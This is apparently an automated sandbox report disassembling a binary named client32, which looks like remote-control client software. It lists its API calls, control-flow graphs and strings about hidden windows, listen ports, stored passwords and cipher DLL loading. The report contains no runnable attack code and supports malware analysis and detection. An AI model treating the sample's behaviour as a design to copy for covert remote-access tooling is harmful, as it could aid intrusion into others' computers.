110314e1-110315f6 call 110ccc90 call 111101b0 call 11125d40 call 11114fb0 call 111101b0 call 11088b30 call 111101b0 call 1105cdb0 call 11110270 call 1105d1a0 call 11027810 call 1100d620 2614->2615 2616 110314a7-110314dc call 111101b0 call 11061710 2614->2616 2657 11031749-11031776 call 110edb10 call 11162bb7 2615->2657 2658 110315fc-11031610 call 1100d330 call 11147060 2615->2658 2616->2615 2658->2657
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                              • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(01578D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                              • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 1620732580-3468083601
                                                                              • Opcode ID: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                              • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                              • Opcode Fuzzy Hash: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                              • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51
                                                                              Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2667 110869d0-110869ed call 110869c0 2670 110869ef-110869ff call 11162bb7 2667->2670 2671 11086a00-11086a10 call 111457a0 2667->2671 2676 11086a12-11086a1a 2671->2676 2676->2676 2677 11086a1c-11086a22 2676->2677 2678 11086a23-11086a29 2677->2678 2678->2678 2679 11086a2b-11086a62 LoadLibraryA 2678->2679 2680 11086ac9-11086ade GetProcAddress 2679->2680 2681 11086a64-11086a6b 2679->2681 2684 11086b6c-11086b7d call 11162bb7 2680->2684 2685 11086ae4-11086af3 GetProcAddress 2680->2685 2682 11086a6d-11086abe GetModuleFileNameA call 11081e00 LoadLibraryA 2681->2682 2683 11086ac0-11086ac3 2681->2683 2682->2683 2683->2680 2683->2684 2685->2684 2688 11086af5-11086b04 GetProcAddress 2685->2688 2688->2684 2691 11086b06-11086b15 GetProcAddress 2688->2691 2691->2684 2692 11086b17-11086b26 GetProcAddress 2691->2692 2692->2684 2693 11086b28-11086b37 GetProcAddress 2692->2693 2693->2684 2694 11086b39-11086b48 GetProcAddress 2693->2694 2694->2684 2695 11086b4a-11086b59 GetProcAddress 2694->2695 2695->2684 2696 11086b5b-11086b6a GetProcAddress 2695->2696 2696->2684 2697 11086b7e-11086b93 call 11162bb7 2696->2697
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                              • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                              • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                              • API String ID: 2201880244-3035937465
                                                                              • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                              • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                              • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                              • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                              Function 11142400 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 677registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 3535843008-1834795898
                                                                              • Opcode ID: 94a73b77105bd84d94668242f28501390e16c566680df690e894548eff980490
                                                                              • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                              • Opcode Fuzzy Hash: 94a73b77105bd84d94668242f28501390e16c566680df690e894548eff980490
                                                                              • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61
                                                                              Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                              • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                              • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                              • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                              • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                              • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                              • _strncpy.LIBCMT ref: 11074E38
                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                              • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                              • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                              • std::exception::exception.LIBCMT ref: 11075038
                                                                              • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection$ChangeCloseCreateEnvironmentException@8ExpandFindNotificationStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                              • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                              • API String ID: 328462399-1497550179
                                                                              • Opcode ID: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                              • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                              • Opcode Fuzzy Hash: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                              • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
                                                                              Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3054 11139a70-11139a87 3055 11139eb2-11139ec1 call 11162bb7 3054->3055 3056 11139a8d-11139a94 3054->3056 3056->3055 3058 11139a9a-11139aa1 3056->3058 3058->3055 3060 11139aa7-11139aae 3058->3060 3060->3055 3061 11139ab4-11139abb 3060->3061 3061->3055 3062 11139ac1-11139ad1 call 11145c70 3061->3062 3065 11139ad3-11139ada 3062->3065 3066 11139ae0-11139b27 call 1105e820 call 110642e0 3062->3066 3065->3055 3065->3066 3071 11139b35-11139b5e call 1112d860 3066->3071 3072 11139b29-11139b30 3066->3072 3075 11139b64-11139b67 3071->3075 3076 11139c1a-11139c21 call 110ea860 3071->3076 3072->3071 3078 11139b75 3075->3078 3079 11139b69-11139b6e 3075->3079 3085 11139c23-11139c3e call 1105e820 3076->3085 3086 11139c40-11139c4f PostMessageA 3076->3086 3080 11139b7b-11139b86 3078->3080 3079->3078 3082 11139b70-11139b73 3079->3082 3083 11139b88 3080->3083 3084 11139b8d-11139ba5 3080->3084 3082->3080 3083->3084 3095 11139c01-11139c08 3084->3095 3096 11139ba7-11139bad 3084->3096 3085->3086 3088 11139c55-11139c5a 3085->3088 3086->3088 3091 11139c65-11139c69 3088->3091 3092 11139c5c-11139c60 call 11110000 3088->3092 3093 11139c6b-11139c73 3091->3093 3094 11139c8d-11139cb6 call 11131320 call 11147ad0 call 1112da60 call 11162777 3091->3094 3092->3091 3100 11139c75-11139c8b 3093->3100 3101 11139cb9-11139cc1 3093->3101 3094->3101 3098 11139c17 3095->3098 3099 11139c0a-11139c11 call 11132990 3095->3099 3103 11139baf-11139bb4 3096->3103 3104 11139bfc 3096->3104 3098->3076 3099->3098 3117 11139c13 3099->3117 3100->3101 3108 11139cc3-11139cdd call 11162777 call 11162bb7 3101->3108 3109 11139cde-11139d04 call 11143a50 call 11147af0 SetWindowTextA 3101->3109 3103->3104 3107 11139bb6-11139bbb 3103->3107 3104->3095 3107->3104 3115 11139bbd-11139bdf 3107->3115 3128 11139d10-11139d29 call 11162777 * 2 3109->3128 3129 11139d06-11139d0d call 111361c0 3109->3129 3115->3104 3127 11139be1-11139bf0 call 11146710 3115->3127 3117->3098 3138 11139bf2-11139bfa 3127->3138 3141 11139d2b-11139d2f 3128->3141 3142 11139d6e-11139d72 3128->3142 3129->3128 3138->3104 3138->3138 3143 11139d43-11139d4a 3141->3143 3144 11139d31-11139d41 call 111361c0 3141->3144 3145 11139d78-11139d7a 3142->3145 3146 11139e3c-11139e3e 3142->3146 3150 11139d64 3143->3150 3151 11139d4c-11139d61 call 11132120 3143->3151 3144->3143 3144->3151 3152 11139d9c-11139da9 call 110f8b70 3145->3152 3153 11139d7c-11139d7e 3145->3153 3148 11139e40-11139e42 3146->3148 3149 11139e5d-11139e6a call 110f8b70 3146->3149 3156 11139e53-11139e5a call 11132120 3148->3156 3157 11139e44-11139e4e call 111361c0 3148->3157 3167 11139eaf-11139eb1 3149->3167 3171 11139e6c-11139e7c IsWindowVisible 3149->3171 3150->3142 3151->3150 3152->3167 3168 11139daf-11139dc0 IsWindowVisible 3152->3168 3153->3152 3160 11139d80-11139d90 call 111361c0 3153->3160 3156->3149 3157->3156 3160->3152 3174 11139d92-11139d99 call 11132120 3160->3174 3167->3055 3168->3167 3175 11139dc6-11139dd6 call 11145c70 3168->3175 3171->3167 3173 11139e7e-11139e89 IsWindowVisible 3171->3173 3173->3167 3176 11139e8b-11139ead EnableWindow call 11132120 EnableWindow 3173->3176 3174->3152 3175->3167 3183 11139ddc-11139df4 GetForegroundWindow IsWindowVisible 3175->3183 3176->3167 3184 11139e01-11139e0d call 11132120 3183->3184 3185 11139df6-11139dff EnableWindow 3183->3185 3188 11139e0f-11139e15 3184->3188 3189 11139e1e-11139e3b EnableWindow call 11162bb7 3184->3189 3185->3184 3188->3189 3190 11139e17-11139e18 SetForegroundWindow 3188->3190 3190->3189
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • PostMessageA.USER32(00040270,000006CF,00000007,00000000), ref: 11139C4F
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetWindowTextA.USER32(00040270,00000000), ref: 11139CF7
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139DBC
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139DEA
                                                                              • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                              • EnableWindow.USER32(00040270,00000001), ref: 11139E27
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139E78
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139E85
                                                                              • EnableWindow.USER32(00040270,00000000), ref: 11139E99
                                                                              • EnableWindow.USER32(00040270,00000000), ref: 11139DFF
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040270,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                              • EnableWindow.USER32(00040270,00000001), ref: 11139EAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                              • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                              • API String ID: 3453649892-3803836183
                                                                              • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                              • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                              • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                              • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
                                                                              Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3193 110305f5-110305fc 3194 11030600-11030610 3193->3194 3194->3194 3195 11030612-11030619 3194->3195 3196 1103061b-1103062d 3195->3196 3197 1103065d 3195->3197 3201 11030650-11030657 3196->3201 3202 1103062f-1103064e wsprintfA 3196->3202 3198 11030662-1103067d call 1105e820 3197->3198 3204 11030703-1103071d call 1102a520 call 11139600 call 11145c70 3198->3204 3205 11030683-11030693 call 11145c70 3198->3205 3201->3197 3201->3204 3202->3198 3218 1103071f-11030726 3204->3218 3219 1103075e-11030765 3204->3219 3205->3204 3211 11030695-110306ce call 1105e820 call 111101b0 3205->3211 3223 110306e1 3211->3223 3224 110306d0-110306df call 1109dd30 3211->3224 3221 11030776-110307a1 call 110286c0 call 1102d190 PostMessageA 3218->3221 3222 11030728-1103072f 3218->3222 3219->3221 3225 11030767-1103076f call 11143a20 3219->3225 3241 110307a3-110307ad PostMessageA 3221->3241 3242 110307af-110307ca 3221->3242 3222->3225 3227 11030731-11030756 call 1105e820 3222->3227 3228 110306e3-110306fe call 1109e5b0 3223->3228 3224->3228 3225->3221 3238 11030771 call 1102d830 3225->3238 3227->3219 3228->3204 3238->3221 3241->3242 3244 110307d8-110307f3 3242->3244 3245 110307cc-110307d6 PostMessageA 3242->3245 3247 11030801-1103081f call 11147060 call 11027810 call 1102d900 3244->3247 3248 110307f5-110307ff PostMessageA 3244->3248 3245->3244 3254 1103081f call 1102d900 3247->3254 3248->3247
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11030645
                                                                              • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostwsprintf
                                                                              • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                              • API String ID: 875889313-3431570279
                                                                              • Opcode ID: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                              • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                              • Opcode Fuzzy Hash: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                              • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                              Function 110310D5 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 315COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(01578D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
